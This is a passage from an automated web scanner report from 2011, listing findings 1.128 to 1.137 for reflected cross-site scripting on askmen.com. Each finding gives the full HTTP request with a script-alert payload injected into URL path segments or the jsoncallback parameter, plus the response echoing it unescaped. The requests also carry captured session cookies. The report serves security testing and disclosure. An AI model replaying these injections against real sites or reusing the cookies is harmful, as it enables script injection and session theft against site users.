Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <title>Page Not Found
...[SNIP]...
<!-- us : includesb742c--><script>alert(1)</script>8a0f8c6be90/js/am/min.php/-->

1.128. http://www.askmen.com/includes/js/am/min.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.askmen.com
Path:   /includes/js/am/min.php

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 96a26--><script>alert(1)</script>80fa17cac57 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /includes/js96a26--><script>alert(1)</script>80fa17cac57/am/min.php?f=ab_test.js&v=1.1.3 HTTP/1.1
Host: www.askmen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.askmen.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=askmen.131775351301803.50.23.123.106; s_vi=[CS]v1|2745A955050126E8-40000108E05B8422[CE]; s_pers=%20s_nr%3D1317753573453%7C1320345573453%3B%20s_lv%3D1317756138497%7C1412364138497%3B%20s_lv_s%3DLess%2520than%25201%2520day%7C1317757938497%3B; __utma=238685328.1799806713.1317753548.1317753548.1317756116.2; __utmz=238685328.1317756116.2.2.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; NGUserID=a5d4238-2366-2041309540-1; rsi_segs=; _chartbeat2=qa5w60rf92klr4yn.1317753718135; NSC_btlnfo_iuuq_wjq=ffffffff0955523745525d5f4f58455e445a4a423660

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.11 (Unix) PHP/5.2.9
X-Powered-By: PHP/5.2.9
ServerHost: askmen-prod-web-app-05
Content-Length: 38688
Content-Type: text/html; charset=iso-8859-1
Expires: Tue, 04 Oct 2011 20:07:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 20:07:06 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <title>Page Not Found
...[SNIP]...
<!-- us : includes/js96a26--><script>alert(1)</script>80fa17cac57/am/min.php/-->

1.129. http://www.askmen.com/includes/js/am/min.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.askmen.com
Path:   /includes/js/am/min.php

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload be4dc--><script>alert(1)</script>25fbaa2e8e2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /includes/js/ambe4dc--><script>alert(1)</script>25fbaa2e8e2/min.php?f=ab_test.js&v=1.1.3 HTTP/1.1
Host: www.askmen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.askmen.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=askmen.131775351301803.50.23.123.106; s_vi=[CS]v1|2745A955050126E8-40000108E05B8422[CE]; s_pers=%20s_nr%3D1317753573453%7C1320345573453%3B%20s_lv%3D1317756138497%7C1412364138497%3B%20s_lv_s%3DLess%2520than%25201%2520day%7C1317757938497%3B; __utma=238685328.1799806713.1317753548.1317753548.1317756116.2; __utmz=238685328.1317756116.2.2.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; NGUserID=a5d4238-2366-2041309540-1; rsi_segs=; _chartbeat2=qa5w60rf92klr4yn.1317753718135; NSC_btlnfo_iuuq_wjq=ffffffff0955523745525d5f4f58455e445a4a423660

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.11 (Unix) PHP/5.2.9
X-Powered-By: PHP/5.2.9
ServerHost: askmen-prod-web-app-05
Content-Length: 38688
Content-Type: text/html; charset=iso-8859-1
Expires: Tue, 04 Oct 2011 20:07:14 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 20:07:14 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <title>Page Not Found
...[SNIP]...
<!-- us : includes/js/ambe4dc--><script>alert(1)</script>25fbaa2e8e2/min.php/-->

1.130. http://www.askmen.com/includes/js/am/min.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.askmen.com
Path:   /includes/js/am/min.php

Issue detail

The value of REST URL parameter 4 is copied into an HTML comment. The payload f3612--><script>alert(1)</script>8774298ba9 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /includes/js/am/min.phpf3612--><script>alert(1)</script>8774298ba9?f=ab_test.js&v=1.1.3 HTTP/1.1
Host: www.askmen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.askmen.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=askmen.131775351301803.50.23.123.106; s_vi=[CS]v1|2745A955050126E8-40000108E05B8422[CE]; s_pers=%20s_nr%3D1317753573453%7C1320345573453%3B%20s_lv%3D1317756138497%7C1412364138497%3B%20s_lv_s%3DLess%2520than%25201%2520day%7C1317757938497%3B; __utma=238685328.1799806713.1317753548.1317753548.1317756116.2; __utmz=238685328.1317756116.2.2.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; NGUserID=a5d4238-2366-2041309540-1; rsi_segs=; _chartbeat2=qa5w60rf92klr4yn.1317753718135; NSC_btlnfo_iuuq_wjq=ffffffff0955523745525d5f4f58455e445a4a423660

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.11 (Unix) PHP/5.2.9
X-Powered-By: PHP/5.2.9
ServerHost: askmen-prod-web-app-05
Content-Length: 38687
Content-Type: text/html; charset=iso-8859-1
Expires: Tue, 04 Oct 2011 20:07:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 20:07:22 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <title>Page Not Found
...[SNIP]...
<!-- us : includes/js/am/min.phpf3612--><script>alert(1)</script>8774298ba9/-->

1.131. http://www.askmen.com/includes/views/helpers/cache.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.askmen.com
Path:   /includes/views/helpers/cache.php

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 60e57--><script>alert(1)</script>03504e51112 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /includes60e57--><script>alert(1)</script>03504e51112/views/helpers/cache.php?c=reactions/get/1052197&ttl=86400&jsoncallback=jQuery16109072330188937485_1317758932211&_=1317758982616 HTTP/1.1
Host: www.askmen.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
Referer: http://www.askmen.com/top_10/cars/fastest-cars-in-the-world.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=askmen.131775351301803.50.23.123.106; s_vi=[CS]v1|2745A955050126E8-40000108E05B8422[CE]; NSC_btlnfo_iuuq_wjq=ffffffff0955523745525d5f4f58455e445a4a423660; decc=US; i18n-cc=US; s_pers=%20s_nr%3D1317753573453%7C1320345573453%3B%20s_lv%3D1317758792503%7C1412366792503%3B%20s_lv_s%3DLess%2520than%25201%2520day%7C1317760592503%3B; show_snazzy_title2=2; _chartbeat2=qa5w60rf92klr4yn.1317753718135; s_sess=%20s_v13%3Dstitial.askmen.com%253Awww.askmen.com%3B%20s_c13%3Dstitial.askmen.com%253Awww.askmen.com%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utma=238685328.1799806713.1317753548.1317756116.1317758791.3; __utmb=238685328.3.10.1317758791; __utmc=238685328; __utmz=238685328.1317758791.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; NGUserID=a5d4238-2366-2041309540-1; freq=c-1317758753956v-2n-29mc+1317758753946mv+0mn+0wwe~0; rsi_segs=

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.11 (Unix) PHP/5.2.9
X-Powered-By: PHP/5.2.9
ServerHost: askmen-prod-web-app-05
Content-Length: 38698
Content-Type: text/html; charset=iso-8859-1
Expires: Tue, 04 Oct 2011 20:19:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 20:19:33 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <title>Page Not Found
...[SNIP]...
<!-- us : includes60e57--><script>alert(1)</script>03504e51112/views/helpers/cache.php/-->

1.132. http://www.askmen.com/includes/views/helpers/cache.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.askmen.com
Path:   /includes/views/helpers/cache.php

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload bf1fd--><script>alert(1)</script>aef62cdb3b1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /includes/viewsbf1fd--><script>alert(1)</script>aef62cdb3b1/helpers/cache.php?c=reactions/get/1052197&ttl=86400&jsoncallback=jQuery16109072330188937485_1317758932211&_=1317758982616 HTTP/1.1
Host: www.askmen.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
Referer: http://www.askmen.com/top_10/cars/fastest-cars-in-the-world.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=askmen.131775351301803.50.23.123.106; s_vi=[CS]v1|2745A955050126E8-40000108E05B8422[CE]; NSC_btlnfo_iuuq_wjq=ffffffff0955523745525d5f4f58455e445a4a423660; decc=US; i18n-cc=US; s_pers=%20s_nr%3D1317753573453%7C1320345573453%3B%20s_lv%3D1317758792503%7C1412366792503%3B%20s_lv_s%3DLess%2520than%25201%2520day%7C1317760592503%3B; show_snazzy_title2=2; _chartbeat2=qa5w60rf92klr4yn.1317753718135; s_sess=%20s_v13%3Dstitial.askmen.com%253Awww.askmen.com%3B%20s_c13%3Dstitial.askmen.com%253Awww.askmen.com%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utma=238685328.1799806713.1317753548.1317756116.1317758791.3; __utmb=238685328.3.10.1317758791; __utmc=238685328; __utmz=238685328.1317758791.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; NGUserID=a5d4238-2366-2041309540-1; freq=c-1317758753956v-2n-29mc+1317758753946mv+0mn+0wwe~0; rsi_segs=

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.11 (Unix) PHP/5.2.9
X-Powered-By: PHP/5.2.9
ServerHost: askmen-prod-web-app-05
Content-Length: 38698
Content-Type: text/html; charset=iso-8859-1
Expires: Tue, 04 Oct 2011 20:19:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 20:19:35 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <title>Page Not Found
...[SNIP]...
<!-- us : includes/viewsbf1fd--><script>alert(1)</script>aef62cdb3b1/helpers/cache.php/-->

1.133. http://www.askmen.com/includes/views/helpers/cache.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.askmen.com
Path:   /includes/views/helpers/cache.php

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload db6bc--><script>alert(1)</script>acf16507727 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /includes/views/helpersdb6bc--><script>alert(1)</script>acf16507727/cache.php?c=reactions/get/1052197&ttl=86400&jsoncallback=jQuery16109072330188937485_1317758932211&_=1317758982616 HTTP/1.1
Host: www.askmen.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
Referer: http://www.askmen.com/top_10/cars/fastest-cars-in-the-world.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=askmen.131775351301803.50.23.123.106; s_vi=[CS]v1|2745A955050126E8-40000108E05B8422[CE]; NSC_btlnfo_iuuq_wjq=ffffffff0955523745525d5f4f58455e445a4a423660; decc=US; i18n-cc=US; s_pers=%20s_nr%3D1317753573453%7C1320345573453%3B%20s_lv%3D1317758792503%7C1412366792503%3B%20s_lv_s%3DLess%2520than%25201%2520day%7C1317760592503%3B; show_snazzy_title2=2; _chartbeat2=qa5w60rf92klr4yn.1317753718135; s_sess=%20s_v13%3Dstitial.askmen.com%253Awww.askmen.com%3B%20s_c13%3Dstitial.askmen.com%253Awww.askmen.com%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utma=238685328.1799806713.1317753548.1317756116.1317758791.3; __utmb=238685328.3.10.1317758791; __utmc=238685328; __utmz=238685328.1317758791.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; NGUserID=a5d4238-2366-2041309540-1; freq=c-1317758753956v-2n-29mc+1317758753946mv+0mn+0wwe~0; rsi_segs=

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.11 (Unix) PHP/5.2.9
X-Powered-By: PHP/5.2.9
ServerHost: askmen-prod-web-app-05
Content-Length: 38698
Content-Type: text/html; charset=iso-8859-1
Expires: Tue, 04 Oct 2011 20:19:36 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 20:19:36 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <title>Page Not Found
...[SNIP]...
<!-- us : includes/views/helpersdb6bc--><script>alert(1)</script>acf16507727/cache.php/-->

1.134. http://www.askmen.com/includes/views/helpers/cache.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.askmen.com
Path:   /includes/views/helpers/cache.php

Issue detail

The value of REST URL parameter 4 is copied into an HTML comment. The payload 449be--><script>alert(1)</script>22759164fa was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /includes/views/helpers/cache.php449be--><script>alert(1)</script>22759164fa?c=reactions/get/1052197&ttl=86400&jsoncallback=jQuery16109072330188937485_1317758932211&_=1317758982616 HTTP/1.1
Host: www.askmen.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
Referer: http://www.askmen.com/top_10/cars/fastest-cars-in-the-world.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=askmen.131775351301803.50.23.123.106; s_vi=[CS]v1|2745A955050126E8-40000108E05B8422[CE]; NSC_btlnfo_iuuq_wjq=ffffffff0955523745525d5f4f58455e445a4a423660; decc=US; i18n-cc=US; s_pers=%20s_nr%3D1317753573453%7C1320345573453%3B%20s_lv%3D1317758792503%7C1412366792503%3B%20s_lv_s%3DLess%2520than%25201%2520day%7C1317760592503%3B; show_snazzy_title2=2; _chartbeat2=qa5w60rf92klr4yn.1317753718135; s_sess=%20s_v13%3Dstitial.askmen.com%253Awww.askmen.com%3B%20s_c13%3Dstitial.askmen.com%253Awww.askmen.com%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utma=238685328.1799806713.1317753548.1317756116.1317758791.3; __utmb=238685328.3.10.1317758791; __utmc=238685328; __utmz=238685328.1317758791.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; NGUserID=a5d4238-2366-2041309540-1; freq=c-1317758753956v-2n-29mc+1317758753946mv+0mn+0wwe~0; rsi_segs=

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.11 (Unix) PHP/5.2.9
X-Powered-By: PHP/5.2.9
ServerHost: askmen-prod-web-app-05
Content-Length: 38697
Content-Type: text/html; charset=iso-8859-1
Expires: Tue, 04 Oct 2011 20:19:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 20:19:37 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <title>Page Not Found
...[SNIP]...
<!-- us : includes/views/helpers/cache.php449be--><script>alert(1)</script>22759164fa/-->

1.135. http://www.askmen.com/includes/views/helpers/cache.php [jsoncallback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.askmen.com
Path:   /includes/views/helpers/cache.php

Issue detail

The value of the jsoncallback request parameter is copied into the HTML document as plain text between tags. The payload cd866<script>alert(1)</script>4845e0f9b68 was submitted in the jsoncallback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /includes/views/helpers/cache.php?c=reactions/get/1052197&ttl=86400&jsoncallback=jQuery16109072330188937485_1317758932211cd866<script>alert(1)</script>4845e0f9b68&_=1317758982616 HTTP/1.1
Host: www.askmen.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
Referer: http://www.askmen.com/top_10/cars/fastest-cars-in-the-world.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=askmen.131775351301803.50.23.123.106; s_vi=[CS]v1|2745A955050126E8-40000108E05B8422[CE]; NSC_btlnfo_iuuq_wjq=ffffffff0955523745525d5f4f58455e445a4a423660; decc=US; i18n-cc=US; s_pers=%20s_nr%3D1317753573453%7C1320345573453%3B%20s_lv%3D1317758792503%7C1412366792503%3B%20s_lv_s%3DLess%2520than%25201%2520day%7C1317760592503%3B; show_snazzy_title2=2; _chartbeat2=qa5w60rf92klr4yn.1317753718135; s_sess=%20s_v13%3Dstitial.askmen.com%253Awww.askmen.com%3B%20s_c13%3Dstitial.askmen.com%253Awww.askmen.com%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utma=238685328.1799806713.1317753548.1317756116.1317758791.3; __utmb=238685328.3.10.1317758791; __utmc=238685328; __utmz=238685328.1317758791.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; NGUserID=a5d4238-2366-2041309540-1; freq=c-1317758753956v-2n-29mc+1317758753946mv+0mn+0wwe~0; rsi_segs=

Response

HTTP/1.1 200 OK
Server: Apache/2.2.11 (Unix) PHP/5.2.9
Content-Length: 145
Content-Type: application/json; charset=utf-8
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding
ServerHost: askmen-prod-web-app-05
AMCache: Hit
Expires: Tue, 04 Oct 2011 20:19:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 20:19:29 GMT
Connection: close

jQuery16109072330188937485_1317758932211cd866<script>alert(1)</script>4845e0f9b68({"4":43,"5":29,"0":14,"2":14,"1":0,"3":0,"total_reactions":7});

1.136. http://www.askmen.com/top_10/cars/fastest-cars-in-the-world.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.askmen.com
Path:   /top_10/cars/fastest-cars-in-the-world.html

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 7ba26--><script>alert(1)</script>e1deec8577f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /top_107ba26--><script>alert(1)</script>e1deec8577f/cars/fastest-cars-in-the-world.html HTTP/1.1
Host: www.askmen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.askmen.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=askmen.131775351301803.50.23.123.106; s_vi=[CS]v1|2745A955050126E8-40000108E05B8422[CE]; NSC_btlnfo_iuuq_wjq=ffffffff0955523745525d5f4f58455e445a4a423660; decc=US; i18n-cc=US; s_pers=%20s_nr%3D1317753573453%7C1320345573453%3B%20s_lv%3D1317758792503%7C1412366792503%3B%20s_lv_s%3DLess%2520than%25201%2520day%7C1317760592503%3B; __utma=238685328.1799806713.1317753548.1317756116.1317758791.3; __utmb=238685328.2.10.1317758791; __utmc=238685328; __utmz=238685328.1317758791.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; NGUserID=a5d4238-2366-2041309540-1; show_snazzy_title2=2; freq=c-1317758753956v-2n-29mc+1317758753946mv+0mn+0wwe~0; rsi_segs=; _chartbeat2=qa5w60rf92klr4yn.1317753718135; s_sess=%20s_v13%3Dstitial.askmen.com%253Awww.askmen.com%3B%20s_c13%3Dstitial.askmen.com%253Awww.askmen.com%3B%20s_cc%3Dtrue%3B%20s_sq%3Dignaskmen-us%253D%252526pid%25253Daskmen%2525253AHomepage%2525253Aam_channel%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.askmen.com/top_10/cars/fastest-cars-in-the-world.html%252526ot%25253DA%3B

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.11 (Unix) PHP/5.2.9
X-Powered-By: PHP/5.2.9
ServerHost: (null)
Content-Length: 38707
Content-Type: text/html; charset=iso-8859-1
Expires: Tue, 04 Oct 2011 20:15:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 20:15:32 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <title>Page Not Found
...[SNIP]...
<!-- us : top_107ba26--><script>alert(1)</script>e1deec8577f/cars/fastest-cars-in-the-world.html-->

1.137. http://www.askmen.com/top_10/cars/fastest-cars-in-the-world.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.askmen.com
Path:   /top_10/cars/fastest-cars-in-the-world.html

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload d514b--><script>alert(1)</script>547716ebfec was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /top_10/carsd514b--><script>alert(1)</script>547716ebfec/fastest-cars-in-the-world.html HTTP/1.1
Host: www.askmen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.askmen.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=askmen.131775351301803.50.23.123.106; s_vi=[CS]v1|2745A955050126E8-40000108E05B8422[CE]; NSC_btlnfo_iuuq_wjq=ffffffff0955523745525d5f4f58455e445a4a423660; decc=US; i18n-cc=US; s_pers=%20s_nr%3D1317753573453%7C1320345573453%3B%20s_lv%3D1317758792503%7C1412366792503%3B%20s_lv_s%3DLess%2520than%25201%2520day%7C1317760592503%3B; __utma=238685328.1799806713.1317753548.1317756116.1317758791.3; __utmb=238685328.2.10.1317758791; __utmc=238685328; __utmz=238685328.1317758791.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; NGUserID=a5d4238-2366-2041309540-1; show_snazzy_title2=2; freq=c-1317758753956v-2n-29mc+1317758753946mv+0mn+0wwe~0; rsi_segs=; _chartbeat2=qa5w60rf92klr4yn.1317753718135; s_sess=%20s_v13%3Dstitial.askmen.com%253Awww.askmen.com%3B%20s_c13%3Dstitial.askmen.com%253Awww.askmen.com%3B%20s_cc%3Dtrue%3B%20s_sq%3Dignaskmen-us%253D%252526pid%25253Daskmen%2525253AHomepage%2525253Aam_channel%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.askmen.com/top_10/cars/fastest-cars-in-the-world.html%252526ot%25253DA%3B

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.11 (Unix) PHP/5.2.9
X-Powered-By: PHP/5.2.9
ServerHost: (null)
Content-Length: 38707
Content-Type: text/html; charset=iso-8859-1
Expires: Tue, 04 Oct 2011 20:15:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 20:15:33 GMT
